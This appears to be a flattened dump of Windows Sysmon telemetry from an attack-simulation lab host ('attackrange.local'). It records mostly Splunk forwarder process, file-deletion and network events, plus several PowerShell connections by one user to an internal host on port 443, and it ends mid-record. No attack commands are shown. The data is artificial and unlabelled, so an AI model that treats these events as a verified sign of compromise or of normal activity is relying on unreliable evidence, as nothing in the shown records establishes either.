15:07:18.010{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343896Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:18.010{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-74A5-613B-6EB4-03000000C801}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343895Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:18.010{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-74A5-613B-6EB4-03000000C801}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343894Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:17.995{B81B27B7-74A5-613B-6EB4-03000000C801}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035343907Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:44.549{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52612-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343906Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:19.295{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C064786BFE8CF786F0C3E21E259B5813,SHA256=FA17CE9A4837C8B56BB9C88DCB962EB4BB1717635D2CD440ABB602B1035648DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343908Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:20.341{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEDF61C83018C972AC022E0B795A911F,SHA256=A3F92FFC35318B4D097FEDC60CDD0340C1B91579F0D27D998FC4D05A064F31C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343909Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:21.381{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF75B41B21F1C93DD4D80AC43A57E991,SHA256=F5D00F34D3FFEC4A3E41BF351F8C92BB3E6C4E436921CFD5B29E9DBE4B47762B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343911Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:48.131{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52613-false10.0.1.12-8000- 23542300x800000000000000035343910Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:22.398{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=799E2A47A4D0E253E6E8DAE9AA61ED1E,SHA256=1CB5AE728A51F39693BEFE734233E18E3E38B6A5288E558CBC88F42FBE006D49,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343913Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:23.413{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=494B9FA9C82E9D0284DAD88220AA4957,SHA256=B9BCD5E78784A69A6F8D6C9E1894C73EA1BAC85BC10D6CAEE2599E8906CAB8C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343912Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:23.228{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343917Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:50.551{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52615-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035343916Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:50.220{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52614-false10.0.1.12-8089- 23542300x800000000000000035343915Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:24.758{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=720E4693C4F4810F19CBACD8FC1A8E8B,SHA256=3D13863ECF49737AE106767D7A0E0F0A86BDF89B7F10BD2958D0071DCE4D65CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343914Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:24.427{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F89FDBC7C61F21A81EA77B881D56D6B,SHA256=FD2E46053DC941F4D7DDCC70D5B60A1432B5AC6A48AD9B1B0F186E22609F171B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343918Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:25.442{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEE38DD7DB6AFE10132201F9F2839337,SHA256=EC95E387ED48A24A841EC66371921482266CC8F79B06F793EA936D668FD40E9A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343919Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:26.458{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97F6F19D9737F81B97B8C9D45C24A707,SHA256=AD5251A5C9623DB7B42AFB54B4CD63C13365854A30058EB71DAB2F1131BD0228,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343922Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:27.475{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3744625545534F47FAF38169CCA4EB58,SHA256=03760146DF621A148F648080F2DE5ED173C546C0B9DE32BA51E3CF03DFD49DCE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343921Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:27.341{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=653D8D0EA417008B241BAC0B8A623CF0,SHA256=26F1EE7DB6051ED112DC4076B2947DFB05D0ADBDAADC6DF0DABC800A4CC7259D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343920Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:27.341{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D890D2888E07745095382448E3045D8C,SHA256=9423D9DA1A7CB727E6A113592DAA37704A366753A8C615F101C05F848F5AD695,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343924Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:28.793{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A90C682F25589DCFAAF0D0A4E025F1C0,SHA256=894BFB4C2690D4177BA71D8D2E96103105B6E93A874976F59DAA1A1055F60860,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343923Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:28.509{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=606E9410A8E3B6B13637595DDE28F5D3,SHA256=381052F5AFA1BECD0CE2077C92658752CAD2E527207DDE92EECA225DCEE5A662,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343927Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:29.524{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9471D64522C1E2C80208588E495E350C,SHA256=E9A038DAAF7977052B80069635E4F2C61EB8A3FFD356B1642915A2CA4B45E941,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343926Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:54.564{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52617-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035343925Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:54.148{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52616-false10.0.1.12-8000- 23542300x800000000000000035343928Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:30.554{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34A21B68D0985DB4A992A0F2A5648F2D,SHA256=B761B8A3D4032CCDC3BF432C7A58B5B6439C64377DA1302D5088156578DDB65A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343947Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.891{B81B27B7-74B3-613B-70B4-03000000C801}67366128C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343946Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.737{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-74B3-613B-70B4-03000000C801}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343945Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.737{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343944Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.737{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343943Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.737{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343942Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.737{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.737{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-74B3-613B-70B4-03000000C801}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343940Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.737{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-74B3-613B-70B4-03000000C801}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.723{B81B27B7-74B3-613B-70B4-03000000C801}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.575{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD30D49615E464D39E183F2FAF922D57,SHA256=8E829CB54E640AA5FEEDCA3798265305BFB5D3D24D91DC2BBFD7FFF4EF941CD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343937Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.307{B81B27B7-74B3-613B-6FB4-03000000C801}20201032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343936Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.138{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-74B3-613B-6FB4-03000000C801}2020C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343935Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:31.138{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343934Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 